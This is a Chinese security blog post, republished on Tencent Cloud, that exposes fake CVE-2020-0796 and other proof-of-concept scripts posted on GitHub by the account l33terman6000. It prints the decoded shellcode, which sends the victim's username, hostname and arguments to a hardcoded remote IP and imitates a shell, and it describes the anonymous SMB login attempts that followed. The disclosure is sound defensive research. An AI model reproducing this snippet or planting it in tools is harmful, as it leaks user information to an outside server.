前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >揭露 | 国产老硬币l33terman6000的骚操作

揭露 | 国产老硬币l33terman6000的骚操作

作者头像
Timeline Sec
发布2020-04-27 12:25:39
7720
发布2020-04-27 12:25:39
举报
文章被收录于专栏:Timeline SecTimeline Sec

0x01 事件起因

昨天早上9点左右逛github时,我发现l33terman6000一次性放出了最近热门的7个漏洞的poc。

0x02 事件经过

兴奋地尝试CVE-2020-0796之后发现,好像可以啊!

仔细一看我发现7个脚本中shellcode完全一样。

Shellcode解码看看。

得到了如下代码:

代码语言:javascript
复制
time.sleep(3)
lhost = os.uname()[1]
command = getpass.getuser() + '@' + (lhost)
args = ' '.join(sys.argv[1:])
ErrorMsg = 'Connection Terminated: (Timeout)'
URL = http://54.184.20.69/poc2.php
PARAMS = {'host':command, 'args':args, 'cve':Bug}
r = requests.get(url = URL, params = PARAMS)
welcome = r.content
if welcome != "":
        rsp = 1
        while rsp != "":
                cmd = raw_input(welcome)
                PARAMS = {'host':command, 'args':cmd, 'cve':Bug}
                r = requests.get(url = URL, params = PARAMS)
                rsp = r.content
                print rsp
                welcome = "C:\WINDOWS\system32>"
time.sleep(10)

发送参数给54.184.20.69/poc2.php, 做的全是和poc2的交互,相当于poc2.php做了http代理。

敲ipconfig之后返回的IP信息在54.184.20.69/ip.txt,其实都是他设置好的。

经过尝试,发现执行dir,whoami,ipconfig都会返回他设置的信息,如果执行其他命令如:ver,shell就会断开。

我是在本地执行的,由于他的poc无法打到我的内网,导致poc2.php中的”真poc”没有触发。于是我在Ubuntu vps上进行实验监听了445端口,还真来东西了。

抓包看看,120.244.60.215来了一堆SMB2请求包,和Ubuntu协商SMB失败。

之后转发内网win10 445端口到Ubuntu vps的445端口,因为他只会访问445端口,怀疑有真CVE-2020-0796poc,之后开始抓poc。

然后我再用假poc去打公网的SMB服务时,执行ipconfig会返回vps地址,网关都换成117.51.142.1,相当逼真。

然后分析SMB流量。

第一个包:协商SMB版本 第二个包:尝试用户名为.密码为空登录 第三个包:尝试对192.168.0.18\IPC$连接 第四个包:再次协商SMB版本 第五个包:尝试SMB匿名登录尝试 第六个包:尝试对192.168.56.20\IPC$连接 怀疑是等待时间太短,之后尝试等待30分钟,vps445端口大概20分钟没流量之后关闭了连接。

可以看到又新增了二个ip来访问SMB,不过还是相同的六次请求,2次实验,共来四个不同ip进行访问,每次指定两个ip去进行IPC$连接。其中发现一个公网ip,其他都是内网ip。

公网ip 62.234.15.3 并没有开SMB服务。

telnet公网ip之后,越来越和poc没有关系了。。。

0x03 最终结论

1、两次使用poc对比

内网使用poc打的话,会返回他设置的54.184.20.69的信息,和你的win10靶机没有任何关系。 公网使用poc打的话,两次实验,共发现4个ip来对靶机进行SMB访问,全是国内ip,每次尝试对两个地址尝试IPC$连接和匿名登录。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-04-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档